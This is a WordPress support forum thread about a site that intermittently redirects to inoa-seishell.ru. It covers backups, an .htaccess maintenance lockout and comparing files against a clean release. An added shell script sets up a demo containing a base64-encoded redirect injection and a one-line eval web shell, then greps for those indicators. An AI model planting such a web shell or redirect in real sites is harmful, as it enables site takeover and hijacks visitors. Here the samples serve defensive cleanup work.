Site hacked

  • Hi,

    My site has been hacked and I’m wondering the best place to start fixing it.

    It keeps redirecting to inoa-seishell.ru

    It’s intermittent (like every 3 or 4 refreshes) and usually occurs within the wp-admin section

    I’ve upgraded to the latest WordPress, and tried to update most of my plugins, but the inoa-seishell.ru URL keeps stopping me.

    Any help appreciated

Viewing 15 replies - 1 through 15 (of 31 total)
  • Do you have a recent backup ?

    I would also search through all your files and the database for ‘inoa-seishell.ru’ string, to see how they did it.

    Then back up the site into a separate file for later examination, and restore back to the last ‘good’ backup.

    Of the SQL database? Yes.

    tigtog

    @tigtoggmailcom

    This sounds like something you’re going to need to address via FTP and maybe php-MyAdmin rather than through the WordPress admin interface.

    In particular, I’d take a look at the .htaccess files in your root and if there are any in your subfolders, and check whether there are suspicious strings in there.

    Good that you have the database backed up.

    I think from other posters here, the recommendation for doing a site restore is to disable plugins. Anyway, here is a suggested ‘path’ to take

    1. Stop people from using your site whilst you do the restore and maintenance. I do this by modifying .htaccess as follows (e.g. if your IP address is 72.233.56.139, for example).

    At the top of your .htaccess file, add these lines

    Options +FollowSymLinks
    RewriteEngine on
    # Let the one allowed client IP through (replace with your own address)
    RewriteCond %{REMOTE_ADDR} !^72\.233\.56\.139$
    # Never redirect the maintenance page itself, otherwise the rule loops
    RewriteCond %{REQUEST_URI} !/maintenance_page\.html$
    # Everything else (directories, .php, .htm/.html/.shtml) gets a temporary 302 to the maintenance page
    RewriteRule ^([^/]*/)*(([^.]+\.)+(php|s?html?))?$ http://www.example.com/maintenance_page.html [R=302,L]

    This assumes you have a file called maintenance_page.html in the public path of your site, with a message like “Sorry, we are closed for maintenance at present”.

    2. Do a full backup of the database and every file.

    3. Search through the database backup from step 2 for that ‘inoa-seishell.ru’ string (without single quotes, of course). There doesn’t seem to be an IP associated with that domain. Record anything you find, etc.

    4. Copy all of WP 3.1.3 to your local machine. Copy all of the plugins, etc. to your local machine as well. Use a tool like Beyond Compare to then compare what was on your website to what is on your local machine. They may have been able to modify some of the files, so this step ‘should’ show up any modified files.

    By the sounds of what is happening, they have added a ‘redirect’ somehow. Hopefully that is all.

    5. Let us know if you find anything.

    Pete
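    Steps 2 to 4 of Pete’s path, worked through as an added shell example that is not part of this thread or of WordPress: it checksums a live tree against a pristine copy of the same release to list added, modified and missing files, greps the tree for indicators (the redirect domain, base64_decode, eval), and greps a database dump for the domain. It also shows the caveat the thread runs into: a redirect stored base64-encoded does not contain the domain as a literal string, so a plain search misses it while the decode call itself still stands out. The directory layout, file contents and the SQL dump are constructed inline for the demo, and the function names (build_sample, compare_trees, scan_for_iocs, dump_hits) are choices made here, not tool or WordPress names.

```shell
#!/bin/sh
# Added example (not from the thread): compare a live WordPress tree against a
# pristine copy of the same release, then grep the tree and a DB dump for
# indicators (the redirect domain, base64_decode, eval). All sample data below
# is constructed for the demo.

# Print "relative-path<TAB>checksum" for every regular file under $1, sorted.
# cksum is POSIX and fine for *spotting* changes; it is not a tamper-proof hash.
tree_hashes() {
  ( cd "$1" && find . -type f | LC_ALL=C sort | while IFS= read -r f; do
      printf '%s\t%s\n' "${f#./}" "$(cksum < "$f" | cut -d' ' -f1)"
    done )
}

# Report ADDED / MODIFIED / MISSING files in the live tree ($2) relative to
# the pristine tree ($1). Paths may contain spaces but not tabs or newlines.
compare_trees() {
  {
    tree_hashes "$1" | awk -F'\t' -v OFS='\t' '{ print "P", $0 }'
    tree_hashes "$2" | awk -F'\t' -v OFS='\t' '{ print "L", $0 }'
  } | awk -F'\t' '
      $1 == "P" { p[$2] = $3; next }
                { l[$2] = $3 }
      END {
        for (f in l) if (!(f in p)) print "ADDED " f
                     else if (p[f] != l[f]) print "MODIFIED " f
        for (f in p) if (!(f in l)) print "MISSING " f
      }' | LC_ALL=C sort
}

# Literal-string search of a tree for each pattern given after the directory.
# Output: "pattern<TAB>relative-path", one line per hit.
scan_for_iocs() {
  dir=$1; shift
  for pat in "$@"; do
    grep -rlF -- "$pat" "$dir" 2>/dev/null | while IFS= read -r f; do
      printf '%s\t%s\n' "$pat" "${f#"$dir"/}"
    done
  done | LC_ALL=C sort -u
}

# Matching lines (with line numbers) of a SQL dump for one pattern. A clean
# result is not proof of a clean database: the string may be stored
# base64/hex-encoded or with escaped slashes, so grep for those forms too.
dump_hits() {
  grep -nF -- "$2" "$1" || true
}

# Build a constructed sample: a pristine tree, a live tree with one tampered
# core file and one dropped file under uploads, and a small SQL dump.
# Prints the root directory.
build_sample() {
  root=$(mktemp -d)
  for d in pristine live; do
    mkdir -p "$root/$d/wp-includes"
    printf '<?php\n// constructed stand-in for a core file\n$wp_version = "3.1.3";\n' \
      > "$root/$d/wp-includes/version.php"
    printf '<?php\n// untouched file\n' > "$root/$d/index.php"
  done
  # Tampered core file: the redirect is base64-encoded, so a literal grep for
  # the domain finds nothing, but the base64_decode call itself stands out.
  enc=$(printf '<script>if(Math.random()<0.3)location.href="http://inoa-seishell.ru/";</script>' | base64 | tr -d '\n')
  printf '<?php echo base64_decode("%s");\n' "$enc" >> "$root/live/wp-includes/version.php"
  # Dropped file in a writable directory, with a tell-tale eval on request data.
  mkdir -p "$root/live/wp-content/uploads"
  printf '<?php @eval($_POST["c"]);\n' > "$root/live/wp-content/uploads/.cache.php"
  # Constructed dump: one widget carries the domain in plain text.
  cat > "$root/dump.sql" <<'EOF'
INSERT INTO `wp_options` VALUES (99,'siteurl','http://www.example.com','yes');
INSERT INTO `wp_options` VALUES (100,'widget_text','<script src="http://inoa-seishell.ru/x.js"></script>','yes');
EOF
  printf '%s\n' "$root"
}

main() {
  root=$(build_sample)
  echo "== file comparison (live vs pristine) =="
  compare_trees "$root/pristine" "$root/live"
  echo "== indicator scan of live tree =="
  scan_for_iocs "$root/live" inoa-seishell.ru base64_decode 'eval('
  echo "== database dump =="
  dump_hits "$root/dump.sql" inoa-seishell.ru
  rm -rf "$root"
}

if [ "${1-}" = "--demo" ]; then main; fi
```

    Run it as `sh compare.sh --demo`. Against a real site, point compare_trees at a freshly downloaded copy of the exact release you are running and at a download of the live tree; anything reported as ADDED or MODIFIED outside wp-content/uploads and wp-config.php deserves a look, and the indicator scan is only a first pass, since the domain can be split, encoded or assembled at runtime.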

    That’s great Pete, thanks, I’ll try that.

    They have also hacked another wordpress site on the same server, so it could be a case that they have access to the root directory of my server

    I’ve changed the ftp username & password (same for all my sites) so hopefully that should stop them for now

    Hmm, if they have hacked into another site on the same server, then server security may not be as tight as it should be, or they have found a back door from one site on the server ‘into’ another site on the same server.

    For example, I have SSH/shell access to the server I use, but server security stops any attempt to ‘get’ to another site on the same server.

    That said, they may simply have used the same ‘dirty tricks’ on 2 sites on the same server.

    Step 2 in my instructions should have been step 1, otherwise .htaccess is not backed up if you do modify that.

    The basis of your investigation is “what have they changed?” So, running a good file comparison tool like Beyond Compare will show up any changes, as long as you download WP 3.1.3 again and use that as a basis for your compare.

    Some of the plugins may have ‘holes’ in them, but if they are popular and lots of downloads, then there would hopefully be less chance of an open door there. Do the compare bit by bit. Beyond compare can even do compares from local to remote (no, I don’t get a commission, lol).

    You can also compare your ‘last good db backup’ with the db backup ‘now’, and pickup anything there that sticks out.

    pete

    tigtog

    @tigtoggmailcom

    You might find the Exploit Scanner plugin useful – that’s what helped me find the culprit files the last time a site got hacked:

    http://wordpress.org/extend/plugins/exploit-scanner/

    I have downloaded the database and searched through it for the inoa-seishell.ru domain, and it is not there. I did an online search with phpMyAdmin also.

    The exploit plugin looks really promising, although when I run it it comes up with: ‘An error occurred. Please try again later.’

    The only thing left for me to try is to download and compare the current site as Pete suggests – would I compare that with a fresh version? They don’t have Beyond Compare for Mac but will try to find an

    I have also used the ‘Inactive users deleter’ plugin to delete hundreds of fake registrations.

    tigtog

    @tigtoggmailcom

    I hope you’ve turned registrations off until you get this sorted.

    I have now

    tigtog

    @tigtoggmailcom

    🙂

    I have downloaded the database and searched through it for the inoa-seishell.ru domain, and it is not there. I did an online search with phpMyAdmin also.

    The domain name exists, but has no IP, so I’m wondering how the redirect worked? Did it actually go to that site? You can force a browser to go to another site, but the user ‘sees’ something else in the URL address bar in the browser. Possibly don’t discount some garbage in your database just yet.

    In regards to turning off registrations: good idea, but people can still access your site, hence the suggestion to modify .htaccess to only allow you to access the site; everyone else will get redirected to the maintenance page.

    The exploit plugin looks really promising, although when I run it it comes up with: ‘An error occurred. Please try again later.’

    If you look at the bottom right-hand corner of this page, you may find some answers to that.

    The only thing left for me to try is to download and compare the current site as Pete suggests – would I compare that with a fresh version? They don’t have Beyond Compare for Mac but will try to find an

    There is a note about Macs here.

    Yes, I would compare with a fresh version, and then compare the fresh version to your (previous) local version of WP. You may see something there, maybe.

    pete

    Thanks I had a look through those

    I have replaced the .htaccess file with your suggested code; the site is still redirecting, so I assume it is not the .htaccess file?

    I will try Beyond Compare tonight.

  • The topic ‘Site hacked’ is closed to new replies.